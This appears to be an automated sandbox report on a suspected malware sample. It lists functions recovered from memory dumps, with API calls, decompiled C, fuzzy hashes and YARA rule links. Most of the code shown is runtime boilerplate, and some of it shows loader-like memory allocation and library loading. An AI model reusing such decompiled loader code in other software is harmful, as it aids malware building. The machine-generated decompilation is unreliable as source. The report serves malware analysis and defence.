Opcode Fuzzy Hash: 23a64d7daef64c1344ffd4d49b21f1cf70c62c31f611e0666afd66dcbf7e0cc9
Instruction Fuzzy Hash: AD711574E00549EFCB08DF95C980BADB7B2FF58304F248598E416AB391D774AE81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E27B0, Relevance: 7.6, APIs: 5, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00217E70,00000000,00000000), ref: 001E27C5
LoadLibraryExW.KERNELBASE(00217E84,00000000,00000000), ref: 001E27D7
LoadLibraryExW.KERNEL32(00217E9C,00000000,00000000), ref: 001E27E9
LoadLibraryExW.KERNELBASE(00217EB8,00000000,00000000), ref: 001E27FB

Part of subcall function 001E14A0: SetLastError.KERNEL32(0000007F), ref: 001E14DB

ExitProcess.KERNEL32 ref: 001E2868

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorExitLastProcess
String ID:
API String ID: 1084912265-0
Opcode ID: 630d7d01cd8ed23059d9b98bcc239a9716830fc69e45614fd498a8df08b7ba8a
Instruction ID: eb85cf943ca3d38d8cae2d904d8690183abb9a89cef8448754325e0c88125a36
Opcode Fuzzy Hash: 630d7d01cd8ed23059d9b98bcc239a9716830fc69e45614fd498a8df08b7ba8a
Instruction Fuzzy Hash: 321189B5D40384BBEB10EFE09C4BFAE7BB4AB54700F105064F910AB2C1D7B09A508B61

Uniqueness

Uniqueness Score: -1.00%

Function 001E21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 001E21F9
SetLastError.KERNEL32(0000007E), ref: 001E223B

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: fdadf651f1a846e73b4c241e6c352f446d42e4c2ab859ccd688c2ece953da611
Instruction ID: c115618003fcfe4d3cb4a6d49f24fc882d66f62ed3003459eecd29b691801bc3
Opcode Fuzzy Hash: fdadf651f1a846e73b4c241e6c352f446d42e4c2ab859ccd688c2ece953da611
Instruction Fuzzy Hash: 0A81C974A00649EFDB08CF85C894EAEB7B5FF88314F248158E919AB351C774AE81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001A002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,001A0005), ref: 001A00E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,001A0005), ref: 001A0111

Memory Dump Source

Source File: 00000004.00000002.2112415861.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: fb59ecec4b1ae87ac2e6d7161616c9dce6edfe68f6cb38555218224cd4eeda05
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: 62D1EE79A043068FDB25CF69C88476AB3E0FF9E308F18852DE8858B241E775EC45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10005FC1, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005FC1(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10015b94 = _t6;
				if(_t6 != 0) {
					_t7 = E10005F66(__eflags);
					__eflags = _t7 - 3;
					 *0x10017614 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000526D(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10015b94);
							 *0x10015b94 =  *0x10015b94 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x10005fd2
0x10005fda
0x10005fdf
0x10005fe4
0x10005fe9
0x10005fec
0x10005ff1
0x10006017
0x10006019
0x1000601a
0x10005ff3
0x10005ff8
0x10005ffd
0x10006000
0x00000000
0x10006002
0x10006008
0x1000600e
0x00000000
0x1000600e
0x10006000
0x10005fe1
0x10005fe1
0x10005fe3
0x10005fe3

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,10002B64,00000001,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C), ref: 10005FD2
HeapDestroy.KERNEL32(?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10006008

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 6f289d45aa02b12d5b832fbc535d6caabd0f035925e93150e6125869ee4eb265
Instruction ID: 6b7975d0cadec78d6b1192bf72ab191b7678825c4d44f27a9285d94a590c429a
Opcode Fuzzy Hash: 6f289d45aa02b12d5b832fbc535d6caabd0f035925e93150e6125869ee4eb265
Instruction Fuzzy Hash: 78E06DB4659312DAF741DB308D8AB2635D5FB483CBF148839F544CD0A8E779C540A601

Uniqueness

Uniqueness Score: -1.00%

Function 001E1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02af0cc4e51a6eb8f7fb7cd85dc87c72bf8e854b82bbab09cf9a17a5a63efca4
Instruction ID: 6cb0c4ad2e53aa42fc522ff6a6c7b47d3ac8b8523b2d6dac3e3e0ba53ed0f67a
Opcode Fuzzy Hash: 02af0cc4e51a6eb8f7fb7cd85dc87c72bf8e854b82bbab09cf9a17a5a63efca4
Instruction Fuzzy Hash: EA419374A00649AFDB05CF85C494BAEB7B2FB88314F24C599E8199B355C775EE82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000631C, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E1000631C() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1000623D(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1000631c
0x1000631e
0x10006320
0x10006322
0x1000632a

APIs

_doexit.LIBCMT ref: 10006322

Part of subcall function 1000623D: __lock.LIBCMT ref: 1000624B
Part of subcall function 1000623D: __decode_pointer.LIBCMT ref: 1000627A
Part of subcall function 1000623D: __decode_pointer.LIBCMT ref: 10006287

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__lock_doexit
String ID:
API String ID: 3276244213-0
Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction ID: 6caad15b2956903762fb358673e0a049e4b95d83649e57b73a93b0c00587de26
Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction Fuzzy Hash: D3A00269BD471021F86095502C43F5421425B54F51FE40490BB082C2C5A5CA23584457

Uniqueness

Uniqueness Score: -1.00%

Function 10001050, Relevance: 1.3, APIs: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001050(intOrPtr _a4, long _a8) {
				void* __edi;
				void* __esi;
				void* _t3;
				void* _t7;
				void* _t9;

				_t8 = _a8;
				_t3 = VirtualAlloc(0, _a8, 0x3000, 0x40); // executed
				_t9 = _t3;
				if(_t9 != 0) {
					 *0x10014030 = 0;
				}
				E10002180(_t7, _t8, _t9, _t9, _a4, _t8);
				return _t9;
			}

0x10001052
0x10001060
0x10001066
0x1000106a
0x1000106c
0x1000106c
0x1000107d
0x10001089

APIs

VirtualAlloc.KERNELBASE(00000000,10001A1F,00003000,00000040,?,00000000,10001A1F,LdrFindResource_U,00000011), ref: 10001060

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4184aac62e3a9acac07311f3c42fa4e6e1215755728dff2a398e5873e5c0ad2c
Instruction ID: 1dffb7e16aabb8da2e54263ec3071c1c24a1cf5ee92a94aa6148ecd011ae2b95
Opcode Fuzzy Hash: 4184aac62e3a9acac07311f3c42fa4e6e1215755728dff2a398e5873e5c0ad2c
Instruction Fuzzy Hash: 38E0CD7260522037F111C6056C45F476BACDBC5B90F014004F74497294C7B0DC0082D5

Uniqueness

Uniqueness Score: -1.00%

Function 001E19F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,001E1A51,00003000,00000004,000000BE,?,001E1A51,?), ref: 001E1A01

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0931adc0b8a7fa772e9de829a2720d9c5012047daf5888cd70b50599e6ef84fa
Instruction ID: 8e93a12d543e5cef4e75559eeaf1430c6d47d5319dcab2bf71eec99718a9d487
Opcode Fuzzy Hash: 0931adc0b8a7fa772e9de829a2720d9c5012047daf5888cd70b50599e6ef84fa
Instruction Fuzzy Hash: 0AD0C974A45208BBE700CBC4DC46F697BACD708A21F000184FE089B280D5B16E404B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 001E182F

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 6b4364dcd0d24448520e09c2058fcac0c9adf4fd62396eac78f48f2d6a3e85cc
Instruction ID: 0c2c624477c1222bd0f216175b27035f4236e655319383d787fa2bbc7eba7842
Opcode Fuzzy Hash: 6b4364dcd0d24448520e09c2058fcac0c9adf4fd62396eac78f48f2d6a3e85cc
Instruction Fuzzy Hash: E6C04C7611424CEB8B44DFD8EC84CAB77ADAB8CA10B00C508FA1D87601C630F9508BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100026C4, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E100026C4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x100140b8; // 0xa587b965
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10016000 = _t6;
				 *0x10015ffc = _t22;
				 *0x10015ff8 = _t25;
				 *0x10015ff4 = _t21;
				 *0x10015ff0 = _t27;
				 *0x10015fec = _t26;
				 *0x10016018 = ss;
				 *0x1001600c = cs;
				 *0x10015fe8 = ds;
				 *0x10015fe4 = es;
				 *0x10015fe0 = fs;
				 *0x10015fdc = gs;
				asm("pushfd");
				_pop( *0x10016010);
				 *0x10016004 =  *_t31;
				 *0x10016008 = _v0;
				 *0x10016014 =  &_a4;
				 *0x10015f50 = 0x10001;
				_t11 =  *0x10016008; // 0x0
				 *0x10015f04 = _t11;
				 *0x10015ef8 = 0xc0000409;
				 *0x10015efc = 1;
				_t12 =  *0x100140b8; // 0xa587b965
				_v812 = _t12;
				_t13 =  *0x100140bc; // 0x5a78469a
				_v808 = _t13;
				 *0x10015f48 = IsDebuggerPresent();
				_push(1);
				E10009301(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1001120c);
				if( *0x10015f48 == 0) {
					_push(1);
					E10009301(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x100026c4
0x100026c4
0x100026c4
0x100026c4
0x100026c4
0x100026c4
0x100026c4
0x100026ca
0x100026cc
0x100026cc
0x10006559
0x1000655e
0x10006564
0x1000656a
0x10006570
0x10006576
0x1000657c
0x10006583
0x1000658a
0x10006591
0x10006598
0x1000659f
0x100065a6
0x100065a7
0x100065b0
0x100065b8
0x100065c0
0x100065cb
0x100065d5
0x100065da
0x100065df
0x100065e9
0x100065f3
0x100065f8
0x100065fe
0x10006603
0x1000660f
0x10006614
0x10006616
0x1000661e
0x10006629
0x10006636
0x10006638
0x1000663a
0x1000663f
0x10006653

APIs

IsDebuggerPresent.KERNEL32 ref: 10006609
SetUnhandledExceptionFilter.KERNEL32 ref: 1000661E
UnhandledExceptionFilter.KERNEL32(1001120C), ref: 10006629
GetCurrentProcess.KERNEL32(C0000409), ref: 10006645
TerminateProcess.KERNEL32(00000000), ref: 1000664C

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f12563bab7356c0ed49a0a5b6e1ca719473d9f164b59e02113018a122a98c26a
Instruction ID: 2a31f80bc3ff1273db5e2c8594a3df057ab36e9a613217c7070c3d24a57d1e0b
Opcode Fuzzy Hash: f12563bab7356c0ed49a0a5b6e1ca719473d9f164b59e02113018a122a98c26a
Instruction Fuzzy Hash: 6221BDB9900224DFE702DF65CCC5B483BA4FB0C346F56806AF5088B671EBB2D6868B55

Uniqueness

Uniqueness Score: -1.00%

Function 100050A3, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E100050A3(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E10004004());
				 *0x10015a38 = 0;
				return _t8;
			}

0x100050a8
0x100050b8
0x100050be
0x100050c5

APIs

__decode_pointer.LIBCMT ref: 100050B1

Part of subcall function 10004004: TlsGetValue.KERNEL32 ref: 10004011
Part of subcall function 10004004: TlsGetValue.KERNEL32 ref: 10004028
Part of subcall function 10004004: RtlDecodePointer.NTDLL(?), ref: 1000405B

SetUnhandledExceptionFilter.KERNEL32 ref: 100050B8

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
String ID:
API String ID: 3433037573-0
Opcode ID: 91a11c645386fa8c1479d34cc30921ecc2f4487b68a9a7423251e2ddf230afff
Instruction ID: c56d215d3621a79afb04aeb5eee53ca650293db3385b058339e3a9f9ff2bcd2e
Opcode Fuzzy Hash: 91a11c645386fa8c1479d34cc30921ecc2f4487b68a9a7423251e2ddf230afff
Instruction Fuzzy Hash: 9AC08C988992C2CAE781C33448CC30C7A00BF0101EFDC8589E5C08C042CCBAC0808623

Uniqueness

Uniqueness Score: -1.00%

Function 1000E6DC, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E1000E6DC(char* _a4, intOrPtr _a8, unsigned int* _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				signed int _v24;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				unsigned int* _t77;
				unsigned int _t80;
				unsigned int _t83;
				unsigned int _t84;
				unsigned int _t85;
				signed int _t87;
				signed int _t90;
				signed int _t100;
				signed int _t107;
				unsigned int _t108;
				unsigned int _t110;
				unsigned int _t111;
				signed int _t116;
				unsigned int _t118;
				unsigned int _t120;
				signed int _t122;
				intOrPtr _t123;
				unsigned int _t133;
				unsigned int _t135;
				unsigned int _t138;
				unsigned int _t145;
				void* _t146;
				unsigned int _t150;
				unsigned int _t151;
				signed int _t152;

				_t75 =  *0x100140b8; // 0xa587b965
				_v8 = _t75 ^ _t152;
				_t77 = _a12;
				_t137 = 0;
				_v28 = 0x404e;
				 *_t77 = 0;
				_t77[1] = 0;
				_t77[2] = 0;
				if(_a8 <= 0) {
					L27:
					while(_t77[2] == _t137) {
						_t90 = _t77[1];
						_t77[2] = _t90 >> 0x10;
						_t116 =  *_t77;
						_t130 = _t116 >> 0x10;
						_t113 = _t116 << 0x10;
						_v28 = _v28 + 0xfff0;
						_t77[1] = _t90 << 0x00000010 | _t116 >> 0x00000010;
						 *_t77 = _t116 << 0x10;
					}
					if((_t77[2] & 0x00008000) != 0) {
						L30:
						_t77[2] = _v28;
						return E100026C4(_t77, 0x8000, _v8 ^ _t152, _t113, _t130, _t137);
					} else {
						goto L29;
					}
					do {
						L29:
						_t138 =  *_t77;
						_t130 = _t77[1];
						_v28 = _v28 + 0xffff;
						 *_t77 = _t138 + _t138;
						_t137 = _t130 + _t130 | _t138 >> 0x0000001f;
						_t113 = _t130 >> 0x1f;
						_t100 = _t77[2] + _t77[2] | _t130 >> 0x0000001f;
						_t77[1] = _t130 + _t130 | _t138 >> 0x0000001f;
						_t77[2] = _t100;
					} while ((0x00008000 & _t100) == 0);
					goto L30;
				} else {
					goto L1;
				}
				do {
					L1:
					_t118 =  *_t77;
					_t80 = _t77[1];
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 = _t118 + _t118;
					_t120 = _t80 + _t80 | _t118 >> 0x0000001f;
					_v24 = _t133;
					_v24 = _v24 & 0x00000000;
					_t107 = (_t77[2] + _t77[2] | _t80 >> 0x0000001f) + (_t77[2] + _t77[2] | _t80 >> 0x0000001f) | _t120 >> 0x0000001f;
					_t83 = _v20;
					_t145 = _t133 + _t133;
					_t122 = _t120 + _t120 | _t133 >> 0x0000001f;
					_t135 = _t145 + _t83;
					 *_t77 = _t145;
					_t77[1] = _t122;
					_t77[2] = _t107;
					if(_t135 < _t145 || _t135 < _t83) {
						_v24 = 1;
					}
					_t84 = 0;
					 *_t77 = _t135;
					if(_v24 != 0) {
						_t151 = _t122 + 1;
						if(_t151 < _t122 || _t151 < 1) {
							_t84 = 1;
						}
						_t77[1] = _t151;
						if(_t84 != 0) {
							_t77[2] = _t107 + 1;
						}
					}
					_t108 = _t77[1];
					_t123 = _v16;
					_t85 = _t108 + _t123;
					_t146 = 0;
					if(_t85 < _t108 || _t85 < _t123) {
						_t146 = 1;
					}
					_t77[1] = _t85;
					if(_t146 != 0) {
						_t77[2] = _t77[2] + 1;
					}
					_t77[2] = _t77[2] + _v12;
					_v24 = _v24 & 0x00000000;
					_t110 = _t135 + _t135;
					_t130 = _t85 + _t85 | _t135 >> 0x0000001f;
					_t87 = _t77[2] + _t77[2] | _t85 >> 0x0000001f;
					 *_t77 = _t110;
					_t77[1] = _t130;
					_t77[2] = _t87;
					_t113 =  *_a4;
					_t150 = _t110 + _t113;
					_v20 = _t113;
					if(_t150 < _t110 || _t150 < _t113) {
						_v24 = 1;
					}
					 *_t77 = _t150;
					if(_v24 != 0) {
						_t111 = _t130 + 1;
						if(_t111 < _t130 || _t111 < 1) {
							_t113 = 1;
						}
						_t77[1] = _t111;
						if(_t113 != 0) {
							_t77[2] = _t87 + 1;
						}
					}
					_a8 = _a8 - 1;
					_a4 = _a4 + 1;
				} while (_a8 > 0);
				_t137 = 0;
				goto L27;
			}

0x1000e6e2
0x1000e6e9
0x1000e6ec
0x1000e6f1
0x1000e6f7
0x1000e6fe
0x1000e700
0x1000e703
0x1000e706
0x00000000
0x1000e852
0x1000e82c
0x1000e834
0x1000e837
0x1000e83e
0x1000e843
0x1000e846
0x1000e84d
0x1000e850
0x1000e850
0x1000e85f
0x1000e891
0x1000e895
0x1000e8a7
0x00000000
0x00000000
0x00000000
0x1000e861
0x1000e861
0x1000e861
0x1000e863
0x1000e866
0x1000e874
0x1000e879
0x1000e880
0x1000e885
0x1000e889
0x1000e88c
0x1000e88c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e70c
0x1000e70c
0x1000e70c
0x1000e70e
0x1000e716
0x1000e717
0x1000e718
0x1000e71e
0x1000e724
0x1000e732
0x1000e737
0x1000e745
0x1000e747
0x1000e74a
0x1000e74e
0x1000e750
0x1000e755
0x1000e757
0x1000e75a
0x1000e75d
0x1000e763
0x1000e763
0x1000e76a
0x1000e76f
0x1000e771
0x1000e773
0x1000e778
0x1000e781
0x1000e781
0x1000e784
0x1000e787
0x1000e78a
0x1000e78a
0x1000e787
0x1000e78d
0x1000e790
0x1000e793
0x1000e796
0x1000e79a
0x1000e7a2
0x1000e7a2
0x1000e7a5
0x1000e7a8
0x1000e7aa
0x1000e7aa
0x1000e7b0
0x1000e7b3
0x1000e7b7
0x1000e7c2
0x1000e7d2
0x1000e7d4
0x1000e7d6
0x1000e7d9
0x1000e7dc
0x1000e7df
0x1000e7e4
0x1000e7e7
0x1000e7ed
0x1000e7ed
0x1000e7f8
0x1000e7fa
0x1000e7fc
0x1000e803
0x1000e80c
0x1000e80c
0x1000e80f
0x1000e812
0x1000e815
0x1000e815
0x1000e812
0x1000e818
0x1000e81b
0x1000e81e
0x1000e828
0x00000000

Strings

N@, xrefs: 1000E6F7

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 50e248b23567b89b0af425ddfe87bc42e5ad531f9582c32191392d9e58aa050d
Instruction ID: 5ee0cc3dc7e1447d754d4feb0cd2480d70657b35740dbdc160f74a8601fa29ab
Opcode Fuzzy Hash: 50e248b23567b89b0af425ddfe87bc42e5ad531f9582c32191392d9e58aa050d
Instruction Fuzzy Hash: 4D617E71A012668FDB58CF49C48856AF7F2FF88344B1AC1ADD9096B36ACB709D45CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 001A095E, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2112415861.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80709103405d6f33fe9138072e6fbe612cf2f58efd1f0cb1cf06fdd26c03af59
Instruction ID: db38e76c96a1a4c61d94b26f39e4c6164746bab034d1522727778da98b865ba5
Opcode Fuzzy Hash: 80709103405d6f33fe9138072e6fbe612cf2f58efd1f0cb1cf06fdd26c03af59
Instruction Fuzzy Hash: F4F118B9A01209EFDB04CF94C990BAEB7B5BF4D304F208598E906AB345D771EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A0456, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2112415861.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 0e2a7d8f80a83bbed81710012d223323d4938fc45d493c5026a45f2e7fee2f7b
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: E431A23AA0874A8FC711DF18C4C092AB7E4FF8E714F0609ADEA9587312D334F9468B91

Uniqueness

Uniqueness Score: -1.00%

Function 100043B0, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100043B0(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10015a14 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10015a18 = GetProcAddress(_t37, "FlsGetValue");
					 *0x10015a1c = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10015a14;
					_t40 = TlsSetValue;
					 *0x10015a20 = _t7;
					if( *0x10015a14 == 0) {
						L6:
						 *0x10015a18 = TlsGetValue;
						 *0x10015a14 = E10004067;
						 *0x10015a1c = _t40;
						 *0x10015a20 = TlsFree;
					} else {
						__eflags =  *0x10015a18;
						if( *0x10015a18 == 0) {
							goto L6;
						} else {
							__eflags =  *0x10015a1c;
							if( *0x10015a1c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10014124 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10015a18);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E1000632B();
							 *0x10015a14 = E10003F98( *0x10015a14);
							 *0x10015a18 = E10003F98( *0x10015a18);
							 *0x10015a1c = E10003F98( *0x10015a1c);
							 *0x10015a20 = E10003F98( *0x10015a20);
							_t18 = E100050C6();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1000409A();
								goto L15;
							} else {
								_push(E10004226);
								_t21 =  *((intOrPtr*)(E10004004( *0x10015a14)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10014120 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1000762C(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10014120);
										__eflags =  *((intOrPtr*)(E10004004( *0x10015a1c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E100040D7(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1000409A();
					return 0;
				}
			}

0x100043b0
0x100043bc
0x100043c0
0x100043e0
0x100043ed
0x100043fa
0x100043ff
0x10004401
0x10004408
0x1000440e
0x10004413
0x1000442b
0x10004430
0x1000443a
0x10004444
0x1000444a
0x10004415
0x10004415
0x1000441c
0x00000000
0x1000441e
0x1000441e
0x10004425
0x00000000
0x10004427
0x10004427
0x10004429
0x00000000
0x00000000
0x10004429
0x10004425
0x1000441c
0x1000444f
0x10004455
0x10004458
0x1000445d
0x1000452f
0x1000452f
0x1000452f
0x10004463
0x1000446a
0x1000446c
0x1000446e
0x00000000
0x10004474
0x10004474
0x1000448a
0x1000449a
